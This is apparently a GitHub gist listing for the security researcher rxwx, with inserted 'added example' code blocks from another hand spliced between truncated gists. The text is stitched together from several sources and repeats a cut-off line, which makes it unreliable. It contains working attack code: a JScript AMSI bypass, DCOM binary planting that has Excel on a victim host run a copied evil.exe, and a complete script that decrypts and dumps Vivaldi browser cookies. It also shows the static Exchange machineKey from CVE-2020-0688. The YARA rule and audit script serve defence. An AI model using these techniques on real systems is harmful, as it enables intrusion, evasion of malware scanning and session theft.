@rxwx
rxwx / offver.py
Created Apr 15, 2020
Get Office version that last saved the file
import re
import sys

# Version codes as used in the BIFF8 BOF record's verLastXLSaved field
# ([MS-XLS] 2.4.21): the application that last saved the workbook
versions = {
    0x00: 'Excel 97',
    0x01: 'Excel 2000',
    0x02: 'Excel 2002',
    0x03: 'Office Excel 2003',
    0x04: 'Office Excel 2007',
    0x06: 'Excel 2010',
}
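The listing cuts the gist off after the version table. As an added example (not the gist's own code), the script below reads the "last saved by" version for both container formats: for legacy `.xls` it locates the BIFF8 BOF record and decodes verLastXLSaved using the same table, and for OOXML packages it reads `AppVersion` from `docProps/app.xml`. The BOF layout (type 0x0809, 16-byte body, verLowestBiff at body byte 12, verLastXLSaved in the low nibble of byte 13) is taken from [MS-XLS] 2.4.21; the OOXML major-number mapping is the usual 12/14/15/16 scheme. The byte-search shortcut instead of a full OLE2 parse is an assumption that holds for the first BOF, which sits at the start of the Workbook stream. The two sample inputs are constructed for the example, not real documents.

```python
"""Report the Office version that last saved a file (added example; Python 3).

.xls  : BIFF8 BOF record -> verLastXLSaved ([MS-XLS] 2.4.21)
.xlsx : docProps/app.xml -> <AppVersion>major.minor</AppVersion>
"""
import io
import re
import struct
import sys
import zipfile

# verLastXLSaved -> product ([MS-XLS] 2.4.21)
BIFF_LAST_SAVED = {
    0x00: 'Excel 97',
    0x01: 'Excel 2000',
    0x02: 'Excel 2002',
    0x03: 'Office Excel 2003',
    0x04: 'Office Excel 2007',
    0x06: 'Excel 2010',
}

# AppVersion major number -> release (docProps/app.xml)
OOXML_APP_VERSION = {
    12: 'Office 2007',
    14: 'Office 2010',
    15: 'Office 2013',
    16: 'Office 2016 or later',
}

OLE2_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'
# BOF record header (type 0x0809, size 0x0010, little-endian) then the 16-byte body.
# A byte search is used instead of an OLE2 parse: the first BOF is at the start of
# the Workbook stream, so its body is never split across a sector boundary.
_BOF_RE = re.compile(rb'\x09\x08\x10\x00(.{16})', re.DOTALL)
_APPVER_RE = re.compile(rb'<AppVersion>(\d+)\.(\d+)</AppVersion>')


def biff_last_saved(data):
    """Product that last saved a BIFF8 workbook, or None if no BOF is found."""
    m = _BOF_RE.search(data)
    if not m:
        return None
    body = m.group(1)
    if struct.unpack('<H', body[:2])[0] != 0x0600:   # vers: 0x0600 = BIFF8
        return None
    code = body[13] & 0x0F                            # verLastXLSaved (byte 12 is verLowestBiff)
    return BIFF_LAST_SAVED.get(code, 'unknown (0x%x)' % code)


def ooxml_last_saved(data):
    """Release recorded in docProps/app.xml of an OOXML package, or None."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            app = zf.read('docProps/app.xml')
    except (zipfile.BadZipFile, KeyError):
        return None
    m = _APPVER_RE.search(app)
    if not m:
        return None
    major = int(m.group(1))
    return OOXML_APP_VERSION.get(major, 'unknown (%d.%s)' % (major, m.group(2).decode()))


def office_last_saved(data):
    """Dispatch on the container magic; None for anything that is neither."""
    if data[:2] == b'PK':
        return ooxml_last_saved(data)
    if data[:8] == OLE2_MAGIC:
        return biff_last_saved(data)
    return None


def _build_samples():
    """Constructed inputs for a stand-alone run (not real documents)."""
    body = struct.pack('<HHHH', 0x0600, 0x0005, 0x0DBB, 0x07CC)  # vers, dt, rupBuild, rupYear
    body += b'\x00\x00\x00\x00'                                 # flags (not needed here)
    body += bytes([0x06, 0x06, 0x00, 0x00])  # verLowestBiff=6, verLastXLSaved=6 -> Excel 2010
    xls = OLE2_MAGIC + b'\x00' * 504 + b'\x09\x08\x10\x00' + body
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('docProps/app.xml',
                    '<Properties><AppVersion>16.0300</AppVersion></Properties>')
    return xls, buf.getvalue()


SAMPLE_XLS, SAMPLE_XLSX = _build_samples()

if __name__ == '__main__':
    for path in sys.argv[1:]:
        with open(path, 'rb') as fh:
            print(path, office_last_saved(fh.read()) or 'no version record found')
```

Run it as `python offver_example.py suspicious.xls other.docx`. Note that AppVersion in an OOXML package identifies the application that last wrote `app.xml`, which for generated or tampered documents may not be the application that produced the rest of the package.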
@rxwx
rxwx / vivaldi-decrypt.py
Last active May 14, 2020
Decrypt Vivaldi Cookies on MacOS
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil


def clean(x):
    # Strip PKCS#7 padding: the last byte gives the pad length
    pad = x[-1] if isinstance(x[-1], int) else ord(x[-1])  # bytes on Py3, str on Py2
    return x[:-pad]


# Make a copy of the cookie file
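The gist is cut off after the comment. As an added example (not the gist's code), the script below carries the same pipeline through to the end: read the Safe Storage password from the login keychain, derive the AES key the way Chromium's macOS `os_crypt` does (PBKDF2-HMAC-SHA1, salt `saltysalt`, 1003 iterations, 16-byte key), copy the locked SQLite database, and decrypt each `v10`-prefixed `encrypted_value` with AES-128-CBC under a 16-space IV. The keychain service name `Vivaldi Safe Storage` and the profile path are assumptions for Vivaldi; the cookie table columns are Chromium's. The padding check rejects malformed padding rather than trusting the last byte.

```python
"""Decrypt Chromium-style 'v10' cookies from a Vivaldi profile on macOS (added example; Python 3)."""
import hashlib
import os
import shutil
import sqlite3
import subprocess
import tempfile

SALT = b'saltysalt'
ITERATIONS = 1003          # Chromium on macOS; the Linux basic backend uses 1
KEY_LEN = 16
IV = b' ' * 16
PREFIX = b'v10'
KEYCHAIN_SERVICE = 'Vivaldi Safe Storage'                         # assumed for Vivaldi
COOKIE_DB = os.path.expanduser(
    '~/Library/Application Support/Vivaldi/Default/Cookies')       # assumed profile path


def derive_key(password):
    """AES-128 key from the keychain password (Chromium os_crypt parameters)."""
    return hashlib.pbkdf2_hmac('sha1', password, SALT, ITERATIONS, KEY_LEN)


def strip_pkcs7(data):
    """Remove PKCS#7 padding, rejecting malformed padding instead of trusting it."""
    if not data or len(data) % 16:
        raise ValueError('ciphertext length is not a whole number of blocks')
    n = data[-1]
    if not 1 <= n <= 16 or data[-n:] != bytes([n]) * n:
        raise ValueError('bad PKCS#7 padding')
    return data[:-n]


def _aes_cbc_decrypt(key, ct):
    """AES-128-CBC with the fixed IV; pycryptodome first, cryptography as fallback."""
    try:
        from Crypto.Cipher import AES
        return AES.new(key, AES.MODE_CBC, IV).decrypt(ct)
    except ImportError:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        d = Cipher(algorithms.AES(key), modes.CBC(IV)).decryptor()
        return d.update(ct) + d.finalize()


def decrypt_value(encrypted_value, key):
    """Plaintext cookie value; values without the 'v10' prefix are returned unchanged."""
    if not encrypted_value.startswith(PREFIX):
        return encrypted_value
    return strip_pkcs7(_aes_cbc_decrypt(key, encrypted_value[len(PREFIX):]))


def keychain_password(service=KEYCHAIN_SERVICE):
    """Read the Safe Storage password with /usr/bin/security (the user is prompted)."""
    out = subprocess.check_output(['security', 'find-generic-password', '-w', '-s', service])
    return out.strip()


def dump_cookies(db_path, key):
    """Yield (host, name, value) from a copy of the database; the live file is locked."""
    tmp = tempfile.mkdtemp()
    try:
        copy = os.path.join(tmp, 'Cookies')
        shutil.copy2(db_path, copy)
        con = sqlite3.connect(copy)
        try:
            for host, name, enc in con.execute(
                    'SELECT host_key, name, encrypted_value FROM cookies'):
                yield host, name, decrypt_value(enc, key).decode('utf-8', 'replace')
        finally:
            con.close()
    finally:
        shutil.rmtree(tmp)


if __name__ == '__main__':
    k = derive_key(keychain_password())
    for host, name, value in dump_cookies(COOKIE_DB, k):
        print('%s\t%s\t%s' % (host, name, value))
```

Running this prompts a keychain access dialog for the Safe Storage item; without that consent (or a copy of the login keychain and its password) the key cannot be derived, which is the whole point of the design.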
# Make a copy of the cookie file
rxwx / CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
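The fragment above is the static `machineKey` that made CVE-2020-0688 exploitable: with a fixed validationKey, any authenticated user can produce a MAC-valid `__VIEWSTATE` for the Exchange Control Panel. The check below is an added example, not part of the gist; it parses a `web.config` and flags a `machineKey` that still carries either of the two values shown above, which is the confirmation a practitioner wants after patching (the fix rotates the keys). Only the key values come from the page; the sample configs are constructed.

```python
"""Flag an ASP.NET machineKey that still uses the static Exchange ECP keys (added example; Python 3)."""
import xml.etree.ElementTree as ET

# Known static values from the fragment above, compared case-insensitively
KNOWN_STATIC_KEYS = {
    'validationKey': 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF',
    'decryptionKey': 'E9D2490BD0075B51D1BA5288514514AF',
}


def audit_machine_key(web_config_xml):
    """Return a list of findings for the <machineKey> element; an empty list is a pass."""
    root = ET.fromstring(web_config_xml)
    mk = root.find('.//machineKey')
    if mk is None:
        # No explicit element: ASP.NET auto-generates per-machine keys, nothing to flag
        return []
    findings = []
    for attr, static in KNOWN_STATIC_KEYS.items():
        value = (mk.get(attr) or '').strip()
        if value.upper() == static:
            findings.append('%s is the well-known static Exchange ECP value' % attr)
        elif not value:
            findings.append('%s attribute missing' % attr)
    return findings


# Constructed samples: the first reproduces the fragment above, the second has rotated keys
WEAK_CONFIG = '''<configuration><system.web>
  <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
              decryptionKey="E9D2490BD0075B51D1BA5288514514AF"
              validation="SHA1" decryption="3DES" />
</system.web></configuration>'''

ROTATED_CONFIG = '''<configuration><system.web>
  <machineKey validationKey="00112233445566778899AABBCCDDEEFF0011223344556677"
              decryptionKey="FFEEDDCCBBAA99887766554433221100"
              validation="SHA1" decryption="3DES" />
</system.web></configuration>'''

if __name__ == '__main__':
    import sys
    for path in sys.argv[1:]:
        with open(path, encoding='utf-8') as fh:
            print(path, audit_machine_key(fh.read()) or 'ok')
```

Point it at the ECP application's `web.config` (for an Exchange server, under `ClientAccess\ecp`); a non-empty result means the ViewState MAC secret is still public knowledge regardless of the build number.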
@rxwx
rxwx / pulseversion.py
Created Aug 13, 2019
Pulse Secure Version Scanner
import requests
import sys
import re

# Browser-like User-Agent so the request is not treated differently from an interactive client
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}

if len(sys.argv) != 2:
    print(" Usage: python pulseversion.py <target ip/domain>")
    sys.exit(1)
@rxwx
rxwx / bypass.js
Created Aug 16, 2018
AMSIEnable Bypass in JScript
var sh = new ActiveXObject('WScript.Shell');
// Per-user switch that Windows Script Host checks before passing script text to AMSI
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try {
    var AmsiEnable = sh.RegRead(key);
    if (AmsiEnable != 0) {
        throw new Error(1, ''); // value exists but is not 0: fall through to the write
    }
} catch (e) {
    // RegRead throws when the value does not exist; either way set it to 0
    sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
}
@rxwx
rxwx / ziptool.ps1
Created May 4, 2018
File Zip in native PowerShell with .NET 3.0
<#
.SYNOPSIS
Author: Rich Warren
Based on original C# code by Jon Galloway:
https://weblogs.asp.net/jongalloway/creating-zip-archives-in-net-without-an-external-library-like-sharpziplib
.DESCRIPTION
Tool for creating a Zip file in native PowerShell with .NET 3.0 only.
@rxwx
rxwx / notes.md
Last active Feb 21, 2020
Notes on new Equation Editor Exploit, CVE-2018-0802 variant

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and was patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 as well.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

@rxwx
rxwx / CVE_2017_8759_CRLF.yara
Created Sep 17, 2017
Yara rule to detect attempts to exploit .NET CRLF injection in a WSDL file (aka CVE-2017-8759)
rule CVE_2017_8759_CRLF {
    meta:
        description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
        author = "Rich Warren @buffaloverflow"
        reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
        date = "2017-09-17"
    strings:
        // a line break right after the opening quote of the soap:address location is the injection marker
        $s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
    condition:
        $s1
}
@rxwx
rxwx / foxprow.ps1
Last active Sep 14, 2017
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
# Instantiate Excel on the remote host over DCOM (by default this needs local admin on the target)
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
# (%LOCALAPPDATA%\Microsoft\WindowsApps is on the user's PATH on Windows 10 and is user-writable)
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
# XlMSApplication 5 = xlMicrosoftFoxPro: Excel resolves FOXPROW.EXE via the PATH
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)